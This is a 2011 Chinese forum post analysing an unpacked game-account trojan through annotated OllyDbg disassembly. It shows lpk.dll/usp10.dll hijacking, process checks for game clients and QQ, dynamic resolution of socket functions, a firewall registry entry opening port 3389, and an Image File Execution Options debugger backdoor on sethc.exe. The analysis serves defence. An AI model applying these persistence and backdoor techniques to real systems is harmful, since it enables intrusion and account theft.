-
-
[原创]一个木马分析,请大家多多指教,提高分析
-
发表于: 2011-10-15 23:58 7235
-
脱壳后:
10015DE8 8BFF mov edi, edi //OEP入口点
10015DEA 55 push ebp
10015DEB 8BEC mov ebp, esp
10015DED 837D 0C 01 cmp dword ptr [ebp+C], 1
10015DF1 75 05 jnz short 10015DF8
10015DF3 E8 56780000 call 1001D64E
10015DF8 FF75 08 push dword ptr [ebp+8]
10015DFB 8B4D 10 mov ecx, dword ptr [ebp+10]
10015DFE 8B55 0C mov edx, dword ptr [ebp+C]
10015E01 E8 ECFEFFFF call 10015CF2 关键call
10015E06 59 pop ecx
10015E07 5D pop ebp
10015E08 C2 0C00 retn 0C
10009916 FF75 08 push dword ptr [ebp+8]
10009919 FF15 A4200210 call dword ptr [100220A4] ; kernel32.DisableThreadLibraryCalls
1000991F 6A 37 push 37
10009921 68 B4250210 push 100225B4 ; ASCII "LpkEditControl"
10009926 E8 1C81FFFF call 10001A47 LpkEditControl是一个数组,里面存放了一些函数,构造lpk
通过劫持系统文件lpk.dll的方法,使游戏优先加载游戏目录下的病毒文件lpk.dll
100019F4 E8 37030100 call 10011D30 //调用lpk
100019F9 83C4 0C add esp, 0C
100019FC 56 push esi
100019FD 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
10001A03 50 push eax
10001A04 FF15 48200210 call dword ptr [10022048] ; kernel32.GetSystemDirectoryA
10001A0A 68 54250210 push 10022554 ; ASCII "\lpk.dll"
10001A0F 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
10001A15 50 push eax
10001A16 FF15 44200210 call dword ptr [10022044] ; kernel32.lstrcatA
10001A1C 833D 1C170310 00 cmp dword ptr [1003171C], 0
10001A23 5E pop esi
10001A24 75 12 jnz short 10001A38
10001A26 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
10001A2C 50 push eax
10001A2D FF15 38200210 call dword ptr [10022038] ; kernel32.LoadLibraryA
加载文件目录下的usp10和lpk
10009A4A 68 B03B0210 push 10023BB0 ; ASCII "%s\Thumbs.db"
10009A4F 68 18160310 push 10031618 ; ASCII "e:\ollyice\Thumbs.db"
10009A54 E8 6D9D0000 call 100137C6 ; 连接本路径和此文件名
10009A59 53 push ebx
10009A5A 68 A03B0210 push 10023BA0 ; ASCII "%s\Usp10.dll"
10009A5F BF C0110310 mov edi, 100311C0 ; ASCII "e:\ollyice\Usp10.dll"
10009A64 57 push edi
10009A65 E8 5C9D0000 call 100137C6
10009A6A 53 push ebx
10009A6B 68 402F0210 push 10022F40 ; ASCII "%s\Lpk.dll"
10009A70 56 push esi
10009A71 E8 509D0000 call 100137C6
10009A76 83C4 24 add esp, 24
10009A79 FF15 5C200210 call dword ptr [1002205C] ; kernel32.GetTickCount
10009A7F 53 push ebx
10009A80 A8 01 test al, 1
10009A82 75 12 jnz short 10009A96
10009A84 68 402F0210 push 10022F40 ; ASCII "%s\Lpk.dll"
10009A89 BB A0C00210 mov ebx, 1002C0A0 ; ASCII "e:\ollyice\Usp10.dll"
10009A8E 53 push ebx
10009A8F E8 329D0000 call 100137C6
10009A94 EB 14 jmp short 10009AAA
10009A96 68 A03B0210 push 10023BA0 ; ASCII "%s\Usp10.dll"
10009A9B 68 A0C00210 push 1002C0A0 ; ASCII "e:\ollyice\Usp10.dll"
10009AA0 E8 219D0000 call 100137C6
10009AA5 BB A0C00210 mov ebx, 1002C0A0 ; ASCII "e:\ollyice\Usp10.dll"
10009AAA 83C4 0C add esp, 0C
10009AAD 57 push edi
10009AAE FF15 84200210 call dword ptr [10022084] ; kernel32.GetFileAttributesA
创建一个线程函数1,地址10009678
10009B0D E8 97B10000 call 10014CA9
10009B12 59 pop ecx
10009B13 59 pop ecx
10009B14 33C0 xor eax, eax
10009B16 50 push eax
10009B17 50 push eax
10009B18 50 push eax
10009B19 68 78960010 push 10009678 线程函数1
10009B1E 50 push eax
10009B1F 50 push eax
10009B20 FF15 94200210 call dword ptr [10022094] ; kernel32.CreateThread
线程函数1:
10009678 /. 55 push ebp ; 线程函数1
10009679 |. 8BEC mov ebp, esp
1000967B |. 81EC 94010000 sub esp, 194
10009681 |. A1 60B00210 mov eax, dword ptr [1002B060]
10009686 |. 33C5 xor eax, ebp
10009688 |. 8945 FC mov [local.1], eax
1000968B |. 53 push ebx
1000968C |. 56 push esi
1000968D |. 57 push edi
1000968E |. E8 657DFFFF call 100013F8 ; 动态加载函数,获取用到的函数的地址 关键call 1
10009693 |. 8D85 6CFEFFFF lea eax, [local.101]
10009699 |. 50 push eax
1000969A |. 33F6 xor esi, esi
1000969C |. 68 02020000 push 202
100096A1 |. 8935 78170310 mov dword ptr [10031778], esi
100096A7 |. 8935 74170310 mov dword ptr [10031774], esi
100096AD |. FF15 F4F70210 call dword ptr [1002F7F4] ; ws2_32.WSAStartup
100096B3 |. BB 00010000 mov ebx, 100
100096B8 |. 53 push ebx
100096B9 |. 56 push esi
100096BA |. BF E0C10210 mov edi, 1002C1E0 ; ASCII "c06a104c7ee76da815861809b2cf7925"
100096BF |. 57 push edi
100096C0 |. E8 6B860000 call <清理一块内存空间出来>
100096C5 |. 53 push ebx
100096C6 |. 56 push esi
100096C7 |. BB F8120310 mov ebx, 100312F8 ; ASCII "d41d8cd98f00b204e9800998ecf8427e"
100096CC |. 53 push ebx
100096CD |. E8 5E860000 call <清理一块内存空间出来>
100096D2 |. 68 04010000 push 104
100096D7 |. 56 push esi
100096D8 |. 68 78DC0210 push 1002DC78
100096DD |. E8 4E860000 call <清理一块内存空间出来>
100096E2 |. 57 push edi
100096E3 |. 68 50C50210 push 1002C550 ; ASCII "d:\tools\ollyice\loaddll.exe"
100096E8 |. E8 EA8FFFFF call <计算出一个32位的字符串>
100096ED |. 53 push ebx
100096EE |. 68 A0C00210 push 1002C0A0 ; ASCII "d:\tools\ollyice\Lpk.dll"
100096F3 |. E8 DF8FFFFF call <计算出一个32位的字符串> ; 计算"d:\tools\ollyice\Lpk.dll"对应的32位字符
100096F8 |. 68 603B0210 push 10023B60 ; d41d8cd98f00b204e9800998ecf8427e
100096FD |. 57 push edi ; 传入之前保存在edi的另一个32的地址,这里是1002c1e0
100096FE |. E8 4DB20000 call <字符比较函数>
10009703 |. 83C4 3C add esp, 3C
10009706 |. BE 18160310 mov esi, 10031618 ; ASCII "d:\tools\ollyice\Thumbs.db"
1000970B |. 85C0 test eax, eax
1000970D |. 75 3B jnz short 1000974A ; 比较后一样往下执行,不一样跳转
1000970F |. 56 push esi
10009710 |. E8 00B20000 call <删除文件>
10009715 |. 59 pop ecx
10009716 |. 6A 01 push 1
10009718 |. 56 push esi
10009719 |. 68 50C50210 push 1002C550 ; ASCII "d:\tools\ollyice\loaddll.exe"
1000971E |. FF15 5C140310 call dword ptr [1003145C] ; kernel32.CopyFileA
10009724 |. 6A 00 push 0
10009726 |. 56 push esi
10009727 |. FF15 B4110310 call dword ptr [100311B4] ; kernel32.SetFileAttributesA
1000972D |. 68 00010000 push 100
10009732 |. 6A 00 push 0
10009734 |. 57 push edi
10009735 |. E8 F6850000 call <清理一块内存空间出来>
1000973A |. 57 push edi
1000973B |. 56 push esi
1000973C |. E8 968FFFFF call <计算出一个32位的字符串>
10009741 |. 56 push esi
10009742 |. E8 CEB10000 call <删除文件>
10009747 |. 83C4 18 add esp, 18
1000974A |> 68 603B0210 push 10023B60 ; d41d8cd98f00b204e9800998ecf8427e
1000974F |. 53 push ebx
10009750 |. E8 FBB10000 call <字符比较函数>
10009755 |. 59 pop ecx
10009756 |. 59 pop ecx
10009757 |. 85C0 test eax, eax
10009759 |. 75 3D jnz short 10009798
1000975B |. 56 push esi
1000975C |. E8 B4B10000 call <删除文件>
10009761 |. 59 pop ecx
10009762 |. 6A 01 push 1
10009764 |. 56 push esi
10009765 |. 68 A0C00210 push 1002C0A0 ; ASCII "d:\tools\ollyice\Lpk.dll"
1000976A |. FF15 5C140310 call dword ptr [1003145C] ; kernel32.CopyFileA把lpk.dll复制为thumbs.db
10009770 |. 33FF xor edi, edi
10009772 |. 57 push edi
10009773 |. 56 push esi
10009774 |. FF15 B4110310 call dword ptr [100311B4] ; kernel32.SetFileAttributesA
1000977A |. 68 00010000 push 100
1000977F |. 57 push edi
10009780 |. 53 push ebx
10009781 |. E8 AA850000 call <清理一块内存空间出来>
10009786 |. 53 push ebx
10009787 |. 56 push esi
10009788 |. E8 4A8FFFFF call <计算出一个32位的字符串>
1000978D |. 56 push esi
1000978E |. E8 82B10000 call <删除文件>
10009793 |. 83C4 18 add esp, 18
10009796 |. EB 02 jmp short 1000979A
10009798 |> 33FF xor edi, edi
1000979A |> 68 583B0210 push 10023B58 ; dnf.exed41d8cd98f00b204e9800998ecf8427e
1000979F |. BE 50C50210 mov esi, 1002C550 ; ASCII "d:\tools\ollyice\loaddll.exe"
100097A4 |. 56 push esi
100097A5 |. E8 969F0000 call <比较cmp> ; 判断当前进程不是不地下城与勇士
100097AA |. 68 483B0210 push 10023B48 ; iexplore.exe
100097AF |. 56 push esi ; d:\tools\ollyice\loaddll.exe
100097B0 |. E8 8B9F0000 call <比较cmp>
100097B5 |. 83C4 10 add esp, 10
100097B8 |. 85C0 test eax, eax
100097BA |. 0F85 2D010000 jnz 100098ED ; 如果不是ie进程 继续往下,是跳转
100097C0 |. 57 push edi
100097C1 |. 57 push edi
100097C2 |. 57 push edi
100097C3 |. 68 00500010 push 10005000 ; 线程2
100097C8 |. 57 push edi
100097C9 |. 57 push edi
100097CA |. FF15 5CC70210 call dword ptr [1002C75C] ; kernel32.CreateThread
100097D0 |. 50 push eax
100097D1 |. FF15 8C100310 call dword ptr [1003108C] ; kernel32.CloseHandle
100097D7 |. 6A 64 push 64
100097D9 |. FF15 7CDD0210 call dword ptr [1002DD7C] ; kernel32.Sleep
100097DF |. 68 403B0210 push 10023B40 ; qq.exe
100097E4 |. 56 push esi
100097E5 |. E8 569F0000 call <比较cmp> ; // 判断qq进程
100097EA |. 59 pop ecx
100097EB |. 59 pop ecx
100097EC |. 85C0 test eax, eax
100097EE |. 0F85 F9000000 jnz 100098ED
100097F4 |. 68 78360210 push 10023678 ; explorer.exe
100097F9 |. 56 push esi
100097FA |. E8 419F0000 call <比较cmp>
100097FF |. 59 pop ecx
10009800 |. 59 pop ecx
10009801 |. 85C0 test eax, eax
10009803 |. 0F85 E4000000 jnz 100098ED
10009809 |. 68 D03A0210 push 10023AD0 ; wow.exews2_32.dll
1000980E |. 56 push esi
1000980F |. E8 2C9F0000 call <比较cmp>
10009814 |. 59 pop ecx
10009815 |. 59 pop ecx
10009816 |. 85C0 test eax, eax
10009818 |. 74 1C je short 10009836 //判断是魔兽世界往下,不是跳转
1000981A |. 57 push edi
1000981B |. 57 push edi
1000981C |. 57 push edi
1000981D |. 68 25930010 push 10009325 ; 线程3
10009822 |. 57 push edi
10009823 |. 57 push edi
10009824 |. FF15 5CC70210 call dword ptr [1002C75C] ; kernel32.CreateThread
1000982A |. 50 push eax
1000982B |. FF15 8C100310 call dword ptr [1003108C] ; kernel32.CloseHandle
10009831 |. E9 B7000000 jmp 100098ED
10009836 |> 68 0C3B0210 push 10023B0C ; xlauncher.exe
1000983B |. 56 push esi
1000983C |. E8 FF9E0000 call <比较cmp>
10009841 |. 59 pop ecx
10009842 |. 59 pop ecx
10009843 |. 85C0 test eax, eax
10009845 |. 0F85 A2000000 jnz 100098ED
1000984B |. 68 403A0210 push 10023A40 ; mir1.dat
10009850 |. 56 push esi
10009851 |. E8 EA9E0000 call <比较cmp>
10009856 |. 59 pop ecx
10009857 |. 59 pop ecx
10009858 |. 85C0 test eax, eax
1000985A |. 0F85 8D000000 jnz 100098ED
10009860 |. 68 343A0210 push 10023A34 ; mir2.dat
10009865 |. 56 push esi
10009866 |. E8 D59E0000 call <比较cmp>
1000986B |. 59 pop ecx
1000986C |. 59 pop ecx
1000986D |. 85C0 test eax, eax
1000986F |. 75 7C jnz short 100098ED
10009871 |. 68 283A0210 push 10023A28 ; mir3.dat
10009876 |. 56 push esi
10009877 |. E8 C49E0000 call <比较cmp>
1000987C |. 59 pop ecx
1000987D |. 59 pop ecx
1000987E |. 85C0 test eax, eax
10009880 |. 75 6B jnz short 100098ED
10009882 |. 68 1C3A0210 push 10023A1C ; mir4.dat
10009887 |. 56 push esi
10009888 |. E8 B39E0000 call <比较cmp>
1000988D |. 59 pop ecx
1000988E |. 59 pop ecx
1000988F |. 85C0 test eax, eax
10009891 |. 75 5A jnz short 100098ED
10009893 |. 68 4C3A0210 push 10023A4C ; mir.exeyx=ftp&ss=%s
10009898 |. 56 push esi
10009899 |. E8 A29E0000 call <比较cmp>
1000989E |. 59 pop ecx
1000989F |. 59 pop ecx
100098A0 |. 85C0 test eax, eax
100098A2 |. 75 49 jnz short 100098ED
100098A4 |. 68 5C300210 push 1002305C ; winhlp32.exe
100098A9 |. 56 push esi
100098AA |. E8 919E0000 call <比较cmp>
100098AF |. 59 pop ecx
100098B0 |. 59 pop ecx
100098B1 |. 85C0 test eax, eax
100098B3 |. 74 2E je short 100098E3
100098B5 |. 57 push edi
100098B6 |. 57 push edi
100098B7 |. 57 push edi
100098B8 |. 68 476A0010 push 10006A47 ; 线程4
100098BD |. 57 push edi
100098BE |. 57 push edi
100098BF |. FF15 5CC70210 call dword ptr [1002C75C] ; kernel32.CreateThread
100098C5 |. 50 push eax
100098C6 |. FF15 8C100310 call dword ptr [1003108C] ; kernel32.CloseHandle
100098CC |. 68 F4010000 push 1F4
100098D1 |. FF15 7CDD0210 call dword ptr [1002DD7C] ; kernel32.Sleep
100098D7 |. C705 5C170310 0>mov dword ptr [1003175C], 0B
100098E1 |. EB 0A jmp short 100098ED
100098E3 |> E8 038CFFFF call 100024EB
100098E8 |. E8 54FDFFFF call 10009641
100098ED |> 8B4D FC mov ecx, [local.1]
100098F0 |. 5F pop edi
100098F1 |. 5E pop esi
100098F2 |. 33CD xor ecx, ebp
100098F4 |. 5B pop ebx
100098F5 |. E8 509F0000 call 1001384A
100098FA |. C9 leave
100098FB \. C3 retn
关键call 1:动态获取调用API函数
100013F8 /$ 55 push ebp
100013F9 |. 8BEC mov ebp, esp
100013FB |. 83EC 18 sub esp, 18
100013FE |. A1 60B00210 mov eax, dword ptr [1002B060]
10001403 |. 33C5 xor eax, ebp
10001405 |. 8945 FC mov [local.1], eax
10001408 |. 53 push ebx
10001409 |. 56 push esi //动态计算
1000140A |. 8B35 38200210 mov esi, dword ptr [10022038] ; kernel32.LoadLibraryA
10001410 |. 57 push edi
10001411 |. 68 48250210 push 10022548 ; /TextOutA
10001416 |. 68 40250210 push 10022540 ; |/GDI32
1000141B |. FFD6 call esi ; |\LoadLibraryA
1000141D |. 8B3D 34200210 mov edi, dword ptr [10022034] ; |kernel32.GetProcAddress
10001423 |. 50 push eax ; |hModule
10001424 |. FFD7 call edi ; \GetProcAddress
10001426 |. 68 30250210 push 10022530 ; /CoInitialize
1000142B |. BB 28250210 mov ebx, 10022528 ; |ole32
10001430 |. 53 push ebx ; |/FileName => "ole32"
10001431 |. A3 F0140310 mov dword ptr [100314F0], eax ; ||
10001436 |. FFD6 call esi ; |\LoadLibraryA
10001438 |. 50 push eax ; |hModule
10001439 |. FFD7 call edi ; \GetProcAddress
1000143B |. 68 18250210 push 10022518 ; /CoUninitialize
10001440 |. 53 push ebx ; |/FileName => "ole32"
10001441 |. A3 B8110310 mov dword ptr [100311B8], eax ; ||
10001446 |. FFD6 call esi ; |\LoadLibraryA
10001448 |. 50 push eax ; |hModule
10001449 |. FFD7 call edi ; \GetProcAddress
1000144B |. 68 04250210 push 10022504 ; /CoCreateInstance
10001450 |. 53 push ebx ; |/FileName => "ole32"
10001451 |. A3 0C160310 mov dword ptr [1003160C], eax ; ||
10001456 |. FFD6 call esi ; |\LoadLibraryA
10001458 |. 50 push eax ; |hModule
10001459 |. FFD7 call edi ; \GetProcAddress
1000145B |. 68 F0240210 push 100224F0 ; /GetForegroundWindowCoCreateInstance
10001460 |. 68 E8240210 push 100224E8 ; |/user32
10001465 |. A3 80100310 mov dword ptr [10031080], eax ; ||
1000146A |. FFD6 call esi ; |\LoadLibraryA
1000146C |. 50 push eax ; |hModule
1000146D |. FFD7 call edi ; \GetProcAddress
1000146F |. 6A 14 push 14
10001471 |. A3 B0110310 mov dword ptr [100311B0], eax
10001476 |. 8D45 E8 lea eax, [local.6]
10001479 |. 6A 00 push 0
1000147B |. 50 push eax
1000147C |. E8 AF080100 call 10011D30
10001481 |. 68 E0240210 push 100224E0 ; rnel3
10001486 |. 8D45 E8 lea eax, [local.6]
10001489 |. 68 D8240210 push 100224D8 ; ke%s2
1000148E |. 50 push eax
1000148F |. E8 32230100 call <字符处理函数>
10001494 |. 83C4 18 add esp, 18
10001497 |. 68 C4240210 push 100224C4 ; RemoveDirectoryA
1000149C |. 8D45 E8 lea eax, [local.6]
1000149F |. 50 push eax ; //动态调用LoadLibraryA函数
100014A0 |. FFD6 call esi ; kernel32.LoadLibraryA
100014A2 |. 50 push eax //保存函数地址
100014A3 |. FFD7 call edi ; kernel32.GetProcAddress
100014A5 |. 68 B0240210 push 100224B0 ; VirtualProtectEx
100014AA |. BB A4240210 mov ebx, 100224A4 ; kernel32
100014AF |. 53 push ebx
100014B0 |. A3 BC100310 mov dword ptr [100310BC], eax
100014B5 |. FFD6 call esi ; kernel32.LoadLibraryA
100014B7 |. 50 push eax
100014B8 |. FFD7 call edi
100014BA |. 68 98240210 push 10022498 ; WriteFile
100014BF |. 53 push ebx
100014C0 |. A3 8C020310 mov dword ptr [1003028C], eax
100014C5 |. FFD6 call esi
100014C7 |. 50 push eax
100014C8 |. FFD7 call edi
100014CA |. 68 8C240210 push 1002248C ; GetFileSizeWriteFile
100014CF |. 53 push ebx
100014D0 |. A3 E8C20210 mov dword ptr [1002C2E8], eax
100014D5 |. FFD6 call esi
100014D7 |. 50 push eax
100014D8 |. FFD7 call edi
100014DA |. 68 78240210 push 10022478 ; GetShortPathNameA
100014DF |. 53 push ebx ; //获取文件短路径
100014E0 |. A3 E8140310 mov dword ptr [100314E8], eax
100014E5 |. FFD6 call esi
100014E7 |. 50 push eax
100014E8 |. FFD7 call edi
100014EA |. 68 68240210 push 10022468 ; GetTempPathA
获取send、recv、connect等函数地址
10001681 |. E8 AA060100 call <清理一块内存空间出来>
10001686 |. 68 F4220210 push 100222F4 ; en
1000168B |. 8D45 E8 lea eax, [local.6]
1000168E |. 68 EC220210 push 100222EC ; s%sd
10001693 |. 50 push eax
10001694 |. E8 2D210100 call <字符处理函数> ; //获取字符send,保存到地址008afdf4
10001699 |. 83C4 18 add esp, 18
1000169C |. 8D45 E8 lea eax, [local.6]
1000169F |. 50 push eax ; //这个地址保存字符send
100016A0 |. 53 push ebx
100016A1 |. FFD6 call esi ; LoadLibraryA
100016A3 |. 50 push eax
100016A4 |. FFD7 call edi ; //GetProcAddress 获取send函数的地址
100016A6 |. A3 DC020310 mov dword ptr [100302DC], eax
100016AB |. 6A 14 push 14
100016AD |. 8D45 E8 lea eax, [local.6]
100016B0 |. 6A 00 push 0
100016B2 |. 50 push eax
100016B3 |. E8 78060100 call <清理一块内存空间出来>
100016B8 |. 68 E8220210 push 100222E8 ; ec
100016BD |. 8D45 E8 lea eax, [local.6]
100016C0 |. 68 E0220210 push 100222E0 ; r%sv
100016C5 |. 50 push eax
100016C6 |. E8 FB200100 call <字符处理函数>
100016CB |. 83C4 18 add esp, 18
100016CE |. 8D45 E8 lea eax, [local.6] ; //得到recv
100016D1 |. 50 push eax
100016D2 |. 53 push ebx
100016D3 |. FFD6 call esi
100016D5 |. 50 push eax
100016D6 |. FFD7 call edi
100016D8 |. 68 D4220210 push 100222D4 ; //gethostnamer%sv
具体计算32的函数:
100027A9 |> /0FB64435 E0 /movzx eax, byte ptr [ebp+esi-20]
100027AE |. |50 |push eax
100027AF |. |68 1C2A0210 |push 10022A1C ; %02x
100027B4 |. |57 |push edi
100027B5 |. |E8 0C100100 |call <字符处理函数>
100027BA |. |83C4 0C |add esp, 0C
100027BD |. |46 |inc esi
100027BE |. |83C7 02 |add edi, 2
100027C1 |. |83FE 10 |cmp esi, 10
100027C4 |.^\7C E3 \jl short 100027A9
内存状态:
1002C1D4 00 00 00 00 00 00 00 00 00 00 00 00 63 30 36 61 ............c06a
1002C1E4 31 30 34 63 37 65 65 37 36 64 61 38 31 35 38 36 104c7ee76da81586
1002C1F4 31 38 30 39 62 32 63 66 37 39 32 35 1809b2cf7925
删除文件函数:
10014915 <4b>/$ 8BFF mov edi, edi
10014917 |. 55 push ebp
10014918 |. 8BEC mov ebp, esp
1001491A |. FF75 08 push [arg.1] ; /FileName = "d:\tools\ollyice\Thumbs.db"
1001491D |. FF15 64200210 call dword ptr [10022064] ; \DeleteFileA
10014923 |. 85C0 test eax, eax
10014925 |. 75 08 jnz short 1001492F
10014927 |. FF15 88200210 call dword ptr [10022088] ; ntdll.RtlGetLastWin32Error
1001492D |. EB 02 jmp short 10014931
1001492F |> 33C0 xor eax, eax
10014931 |> 85C0 test eax, eax
10014933 |. 74 0C je short 10014941
10014935 |. 50 push eax
10014936 |. E8 2F260000 call 10016F6A
1001493B |. 59 pop ecx
1001493C |. 83C8 FF or eax, FFFFFFFF
1001493F |. 5D pop ebp
10014940 |. C3 retn
10014941 |> 33C0 xor eax, eax
10014943 |. 5D pop ebp
10014944 \. C3 retn
线程2: 注册表操作和开启3389端口等等。
10005000 /. 55 push ebp
10005001 |. 8BEC mov ebp, esp
10005003 |. 81EC D8070000 sub esp, 7D8
10005009 |. A1 60B00210 mov eax, dword ptr [1002B060]
1000500E |. 33C5 xor eax, ebp
10005010 |. 8945 FC mov [local.1], eax
10005013 |. 53 push ebx
10005014 |. 56 push esi
10005015 |. 57 push edi
10005016 |. 6A 32 push 32
10005018 |. 33FF xor edi, edi
1000501A |. 57 push edi
1000501B |. BE A4020310 mov esi, 100302A4 ; ASCII "PC2010111223fpr"
10005020 |. 56 push esi
10005021 |. E8 0ACD0000 call <清理一块内存空间出来>
10005026 |. 83C4 0C add esp, 0C
10005029 |. 6A 1E push 1E
1000502B |. 56 push esi
1000502C |. FF15 18020310 call dword ptr [10030218] ; ws2_32.gethostname
10005032 |. BB 04010000 mov ebx, 104 ; hostname:PC2010111223fpr
10005037 |. 53 push ebx
10005038 |. 8D85 CCFEFFFF lea eax, [local.77]
1000503E |. 57 push edi
1000503F |. 50 push eax
10005040 |. E8 EBCC0000 call <清理一块内存空间出来>
10005045 |. 83C4 0C add esp, 0C
10005048 |. 68 00010000 push 100 ; /BufSize = 100 (256.)
1000504D |. 8D85 CCFEFFFF lea eax, [local.77] ; |
10005053 |. 50 push eax ; |Buffer
10005054 |. FF15 54200210 call dword ptr [10022054] ; \GetWindowsDirectoryA
1000505A |. 53 push ebx
1000505B |. 8D85 40F9FFFF lea eax, [local.432]
10005061 |. 57 push edi
10005062 |. 50 push eax
10005063 |. E8 C8CC0000 call <清理一块内存空间出来>
10005068 |. 53 push ebx
10005069 |. 8D85 3CF8FFFF lea eax, [local.497]
1000506F |. 57 push edi
10005070 |. 50 push eax
10005071 |. E8 BACC0000 call <清理一块内存空间出来>
10005076 |. 8D85 CCFEFFFF lea eax, [local.77]
1000507C |. 50 push eax
1000507D |. 8D85 40F9FFFF lea eax, [local.432]
10005083 |. 68 00330210 push 10023300 ; %s\PCHEALTH\HELPCTR\Binaries
10005088 |. 50 push eax
10005089 |. E8 38E70000 call <字符处理函数>
1000508E |. 8D85 CCFEFFFF lea eax, [local.77]
10005094 |. 50 push eax
10005095 |. 8D85 3CF8FFFF lea eax, [local.497]
1000509B |. 68 D4320210 push 100232D4 ; %s\PCHEALTH\HELPCTR\Binaries\helpctr.exe
100050A0 |. 50 push eax
100050A1 |. E8 20E70000 call <字符处理函数>
100050A6 |. 53 push ebx
100050A7 |. 57 push edi
100050A8 |. BE 58C60210 mov esi, 1002C658 ; ASCII "C:\Program Files\Internet Explorer"
100050AD |. 56 push esi
100050AE |. C785 2CF8FFFF 0>mov [local.501], 1
100050B8 |. E8 73CC0000 call <清理一块内存空间出来>
100050BD |. 83C4 3C add esp, 3C
100050C0 |. 8D85 38F8FFFF lea eax, [local.498]
100050C6 |. 50 push eax
100050C7 |. 68 90320210 push 10023290 ; Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
100050CC |. 68 02000080 push 80000002
100050D1 |. FF15 6C140310 call dword ptr [1003146C] ; RegOpenKeyA打开这个键值
100050D7 |. 85C0 test eax, eax
100050D9 |. 75 63 jnz short 1000513E
100050DB |. 8D85 34F8FFFF lea eax, [local.499]
100050E1 |. 50 push eax
100050E2 |. 56 push esi
100050E3 |. 8D85 2CF8FFFF lea eax, [local.501]
100050E9 |. 50 push eax
100050EA |. 57 push edi
100050EB |. 68 84320210 push 10023284 ; Path
100050F0 |. FFB5 38F8FFFF push [local.498]
100050F6 |. 899D 34F8FFFF mov [local.499], ebx
100050FC |. FF15 24150310 call dword ptr [10031524] ; RegQueryValueExA 查询这个键值内容,写到地址1002c658
10005102 |. FFB5 38F8FFFF push [local.498]
10005108 |. FF15 D0100310 call dword ptr [100310D0] ; advapi32.RegCloseKey
1000510E |. 89B5 30F8FFFF mov [local.500], esi
10005114 |. FF8D 30F8FFFF dec [local.500]
1000511A |. 56 push esi
1000511B |. E8 50EA0000 call 10013B70
10005120 |. 59 pop ecx
10005121 |. 8B8D 30F8FFFF mov ecx, [local.500]
10005127 |. 803C08 3B cmp byte ptr [eax+ecx], 3B
1000512B |. 75 11 jnz short 1000513E
1000512D |. 56 push esi
1000512E |. E8 3DEA0000 call 10013B70
10005133 |. 59 pop ecx
10005134 |. 8B8D 30F8FFFF mov ecx, [local.500]
1000513A |. C60408 00 mov byte ptr [eax+ecx], 0
1000513E |> 8D85 38F8FFFF lea eax, [local.498]
10005144 |. 50 push eax
10005145 |. 68 48320210 push 10023248 ; Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedPath
1000514A |. 68 01000080 push 80000001
1000514F |. FF15 6C140310 call dword ptr [1003146C] ; RegOpenKeyA
开启3389端口
10002ACC |. 68 402A0210 |push 10022A40 ; :%dGetTcpTable\iphlpapi.dll
10002AD1 |. 50 |push eax
10002AD2 |. E8 EF0C0100 |call <字符处理函数>
10002AD7 |. 8D45 F0 |lea eax, [local.4]
10002ADA |. 50 |push eax
10002ADB |. 57 |push edi
10002ADC |. E8 5F0C0100 |call <比较cmp>
10002AE1 |. 83C4 14 |add esp, 14
10002AE4 |. 85C0 |test eax, eax
10002AE6 |. 75 0C |jnz short 10002AF4
10002AE8 |. 8D45 F0 |lea eax, [local.4]
10002AEB |. 50 |push eax
10002AEC |. 57 |push edi
10002AED |. E8 8E0F0100 |call 10013A80
10002AF2 |. 59 |pop ecx
10002AF3 |. 59 |pop ecx
10002AF4 |> 68 08110310 |push 10031108 ; ASCII ":z3389"
10002AF9 |. E8 72100100 |call 10013B70
10002AFE |. 59 |pop ecx
10002AFF |. 83F8 02 |cmp eax, 2
10002B02 |. 76 44 |jbe short 10002B48
10002B04 |. 68 0A110310 |push 1003110A ; ASCII "3389"
10002B09 |. E8 FC1D0100 |call 1001490A
10002B0E |. 8985 B8FEFFFF |mov [local.82], eax
10002B14 |. 0FB706 |movzx eax, word ptr [esi]
10002B17 |. 59 |pop ecx
10002B18 |. 50 |push eax
10002B19 |. FF15 14020310 |call dword ptr [10030214] ; ws2_32.ntohs
.....
100055C3 |. 68 70300210 push 10023070 ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\sethc.exe
100055C8 |. BE 02000080 mov esi, 80000002
100055CD |. 56 push esi
100055CE |. FF15 E0C20210 call dword ptr [1002C2E0] ; advapi32.RegCreateKeyA
100055D4 |. 85C0 test eax, eax
100055D6 |. 75 27 jnz short 100055FF
100055D8 |. 6A 0C push 0C
100055DA |. 68 5C300210 push 1002305C ; winhlp32.exe
100055DF |. 6A 01 push 1
100055E1 |. 57 push edi
100055E2 |. 68 50300210 push 10023050 ; debugger
100055E7 |. FFB5 38F8FFFF push [local.498]
100055ED |. FF15 84DD0210 call dword ptr [1002DD84] ; advapi32.RegSetValueExA
100055F3 |. FFB5 38F8FFFF push [local.498]
100055F9 |. FF15 D0100310 call dword ptr [100310D0] ; advapi32.RegCloseKey
100055FF |> 8D85 38F8FFFF lea eax, [local.498]
10005605 |. 50 push eax
10005606 |. 68 E02F0210 push 10022FE0 ; SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\Listdebugger
1000560B |. 56 push esi
1000560C |. FF15 6C140310 call dword ptr [1003146C] ; advapi32.RegOpenKeyA
10005612 |. 85C0 test eax, eax
10005614 |. 75 27 jnz short 1000563D
10005616 |. 6A 27 push 27
10005618 |. 68 B82F0210 push 10022FB8 ; 3389:TCP:*:Enabled:@xpsp2res.dll,-22009SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\Listdebugger
1000561D |. 6A 01 push 1
1000561F |. 57 push edi
10005620 |. 68 AC2F0210 push 10022FAC ; 3389:TCP
10005625 |. FFB5 38F8FFFF push [local.498]
1000562B |. FF15 84DD0210 call dword ptr [1002DD84] ; advapi32.RegSetValueExA
10005631 |. FFB5 38F8FFFF push [local.498]
10005637 |. FF15 D0100310 call dword ptr [100310D0] ; advapi32.RegCloseKey
1000563D |> 8D85 74FCFFFF lea eax, [local.227]
10005643 |. 50 push eax
10005644 |. E8 61F9FFFF call 10004FAA
10005649 |. 8B35 84200210 mov esi, dword ptr [10022084] ; kernel32.GetFileAttributesA
线程3:
10009325 /. 55 push ebp ; 线程3
10009326 |. 8BEC mov ebp, esp
